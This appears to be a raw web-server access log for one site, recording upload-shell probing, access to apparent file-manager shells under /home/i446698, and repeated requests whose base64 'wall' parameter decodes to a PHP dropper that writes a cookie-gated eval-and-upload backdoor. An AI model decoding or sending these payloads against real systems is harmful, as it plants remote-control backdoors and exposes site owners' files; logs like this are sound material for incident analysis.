194.68.32.135 - - [08/Dec/2025:09:53:22 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
43.159.139.164 - - [08/Dec/2025:09:53:41 +0000] "GET /seughtunghdyyshry/admin HTTP/1.1" 301 795 "http://www.metalescrose.com/seughtunghdyyshry/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.139.164 - - [08/Dec/2025:09:53:44 +0000] "GET /seughtunghdyyshry/admin/ HTTP/1.1" 302 0 "http://www.metalescrose.com/seughtunghdyyshry/admin" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.32.245 - - [08/Dec/2025:09:24:35 +0000] "GET /b69e7/?filesrc=/home/i446698/.myimunify_id&path=/home/i446698 HTTP/1.1" 200 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
194.68.32.135 - - [08/Dec/2025:09:33:26 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2667.0 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:09:33:26 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2667.0 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:09:33:27 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2667.0 Safari/537.36"
43.130.228.73 - - [08/Dec/2025:09:34:18 +0000] "GET /b69e7/?path=/home/i446698/.cl.selector HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [08/Dec/2025:09:43:03 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2686.40 Safari/537.36"
192.121.16.196 - - [08/Dec/2025:09:43:03 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2686.40 Safari/537.36"
192.121.16.196 - - [08/Dec/2025:09:43:04 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2686.40 Safari/537.36"
43.157.147.3 - - [08/Dec/2025:09:43:13 +0000] "GET /ik/?NA HTTP/1.1" 200 669 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.249.64.109 - - [08/Dec/2025:09:45:09 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9hd3N0YXRzMDcyMDI0Lm1ldGFsZXNjcm9zZS5jb20udHh0Lm1ldGFsZXNjcm9zZS5jb20udHh0LnRhci5neg== HTTP/1.1" 200 10328 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
195.26.227.171 - - [08/Dec/2025:09:27:16 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)"
194.68.32.135 - - [08/Dec/2025:09:33:13 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2667.0 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:09:33:14 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2667.0 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:09:33:14 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2667.0 Safari/537.36"
192.121.16.196 - - [08/Dec/2025:09:43:26 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2686.40 Safari/537.36"
66.249.64.109 - - [08/Dec/2025:09:48:08 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9hd3N0YXRzMDkyMDIyLm1ldGFsZXNjcm9zZS5jb20udHh0LnRhcg== HTTP/1.1" 200 4794 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
45.227.253.15 - - [08/Dec/2025:09:48:49 +0000] "GET /f3dc2/admin.php?ARRAY=7o2230223n313736353139313230302p2231223n22687474703n5p2s5p2s7n7336363876313361732r6s65636s726573732r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736353138373630302q3034306466646366646663366335303961386331313731346531646365383366222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/101.0"
194.68.32.135 - - [08/Dec/2025:09:52:53 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
194.68.32.135 - - [08/Dec/2025:09:52:53 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
194.68.32.135 - - [08/Dec/2025:09:52:54 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
194.68.32.135 - - [08/Dec/2025:09:52:54 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
43.159.139.164 - - [08/Dec/2025:09:53:38 +0000] "GET /seughtunghdyyshry/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
194.68.32.135 - - [08/Dec/2025:10:02:31 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
194.68.32.135 - - [08/Dec/2025:10:02:31 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
194.68.32.135 - - [08/Dec/2025:10:02:32 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
66.249.64.110 - - [08/Dec/2025:10:04:33 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9hd3N0YXRzMDUyMDIzLm1ldGFsZXNjcm9zZS5jb20udHh0Lm1ldGFsZXNjcm9zZS5jb20udHh0LnRhci5neg== HTTP/1.1" 200 6212 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
141.11.62.221 - - [08/Dec/2025:10:09:34 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2839.55 Safari/537.36"
66.249.64.108 - - [08/Dec/2025:10:10:27 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL25ldy8xNzQ5MDUzMzA0Lk0yNzY1NDhQMTkxNjQwOC5hbHRhcjQzLnN1cHJlbWVwYW5lbDQzLmNvbSxTPTMzMzgsVz0zNDA5 HTTP/1.1" 200 1337 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [08/Dec/2025:10:12:28 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [08/Dec/2025:10:12:28 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [08/Dec/2025:10:12:28 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [08/Dec/2025:10:12:32 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0"
37.112.219.146 - - [08/Dec/2025:10:23:03 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2654.45 Safari/537.36"
37.112.219.146 - - [08/Dec/2025:10:23:04 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2654.45 Safari/537.36"
194.68.32.135 - - [08/Dec/2025:10:02:10 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
194.68.32.135 - - [08/Dec/2025:10:02:10 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
194.68.32.135 - - [08/Dec/2025:10:02:31 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
141.11.62.221 - - [08/Dec/2025:10:09:52 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [08/Dec/2025:10:12:27 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [08/Dec/2025:10:12:27 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0"
37.112.219.146 - - [08/Dec/2025:10:22:52 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2654.45 Safari/537.36"
37.112.219.146 - - [08/Dec/2025:10:23:02 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2654.45 Safari/537.36"
43.159.139.164 - - [08/Dec/2025:09:53:46 +0000] "GET /seughtunghdyyshry/admin/login HTTP/1.1" 200 0 "http://www.metalescrose.com/seughtunghdyyshry/admin/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.249.64.109 - - [08/Dec/2025:10:01:09 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9hd3N0YXRzMDkyMDIyLm1ldGFsZXNjcm9zZS5jb20udHh0Lm1ldGFsZXNjcm9zZS5jb20udHh0LnRhci5neg== HTTP/1.1" 200 4785 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [08/Dec/2025:10:07:57 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9iYWZjNTFkNi02YjljLTY4MTktYzdkYy0wZmM3NTM0Y2U0NWMudmNmLnZjZi50YXIuZ3o= HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
37.112.219.146 - - [08/Dec/2025:10:23:04 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2654.45 Safari/537.36"
37.112.219.146 - - [08/Dec/2025:10:23:05 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2654.45 Safari/537.36"
37.112.219.146 - - [08/Dec/2025:10:32:56 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.219.146 - - [08/Dec/2025:10:43:36 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; Trident/6.0)"
